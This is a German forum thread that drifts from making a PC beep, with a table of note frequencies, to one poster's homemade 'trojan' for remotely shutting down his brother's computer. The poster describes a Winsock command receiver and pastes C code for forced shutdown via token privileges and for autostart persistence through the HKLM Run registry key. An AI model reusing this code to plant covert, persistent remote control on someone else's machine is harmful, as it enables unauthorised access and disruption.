PC piepsen lassen?
-
sry: unter v.3.2 oder 3.3 "enten" eintippen...
-
derbeidemespiepst;) schrieb:
einfach austesten... hat ca. 15 min. gedauert...
(ärgert jtzt meinen Bruder, siehe: http://www.support-network.info/board/1330-brudertools-computerfernsteuerung.html
)wie ist das gemeint ? das du dich in sein pc reinhacks???
-
A bissl: Is ne Art Trojaner, den ich bei ihm in den autostart schreiben lasse...
arbeitet mit Winsockets und schickt dann Anweisungen an eine Art Interpreter...
-
Gibts ne möglichkeit mal den Quellcode einzusehen? Würde mich mal interessieren...
-
+---------------------------------------+ | Freq. | Note | +---------------------------------------+ 262 C - "middle C" 277 C# 294 D 311 D# 330 E 349 F 370 F# 392 G 415 G# 440 A 466 A# 494 H
-
Sorry hatte mich wohl unklar ausgedrückt...
Ich meinte, ob jemand den Quellcode zu dem Bruderärgertool hat:
http://www.support-network.info/board/1330-brudertools-computerfernsteuerung.html
-
Ja, der ist aber *GRAUENHAFT*!!! (Arbeit von ca. 30min....)
Besteht aus:
-Sender:
·Sendet über WINSOCKETS eine char-Array, wie z.B.: "enten\n\0"
·Liest die Antwort, als "Empfangsbestätigung"
-Der Empfänger:
·WINSOCKETS
·Liest den String, vergleicht in mit einigen vorgefertigten, und führt ggf. weitere Operationen durch. Dann wird die Empfangsbestätigung versandt..."shutdown" etc. sind Schnipsel ausm Inet:
bool shdwin(UINT ilFlag) { bool blRetVal = true; TOKEN_PRIVILEGES stTokenPrivileges; HANDLE hProcToken; OSVERSIONINFO stVerInfo; stVerInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx(&stVerInfo); if(stVerInfo.dwPlatformId == VER_PLATFORM_WIN32_NT) { blRetVal = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hProcToken); if(blRetVal) { blRetVal = LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &stTokenPrivileges.Privileges[0].Luid); stTokenPrivileges.PrivilegeCount = 1; stTokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; } if(blRetVal) { blRetVal = AdjustTokenPrivileges(hProcToken, false, &stTokenPrivileges, 0, (PTOKEN_PRIVILEGES)NULL, 0); } } if(blRetVal) { blRetVal = ExitWindowsEx(ilFlag, NULL); } return blRetVal; }
shdwin(EWX_SHUTDOWN); shdwin(EWX_FORCE); shdwin(EWX_POWEROFF); shdwin(EWX_LOGOFF); shdwin(EWX_REBOOT);
Die Autorunzeilen entstammen diesem Forum:
void insertme() { char ModulePath[MAX_PATH]; GetModuleFileName (NULL,ModulePath, MAX_PATH); HKEY hkey; HKEY KEY = HKEY_LOCAL_MACHINE; char place[100]= {"Software\\Microsoft\\Windows\\CurrentVersion\\Run"}; char name[100]= {"bt33"}; RegOpenKeyEx(KEY,(LPCTSTR)place,0, KEY_ALL_ACCESS,&hkey); RegSetValueEx(hkey, name, 0, REG_SZ, (BYTE *)ModulePath, strlen(ModulePath)); RegCloseKey(hkey); }
Naja, sagte ja, das es nur einen Zweck hatte, meinen Bruder vom PC vertreiben, damit ich beide nutzen kann...
-
lal warum reicht dir denn einer nicht??
-
Ich hab wohl noch mehr, aber keinen mit guter Grafikkarte und 2.67Ghz...
-
Wen Noten und deren Frequenzen interessiert, kann hier mal reinschauen:
Die Berechnung der Frequenz der Noten
MfG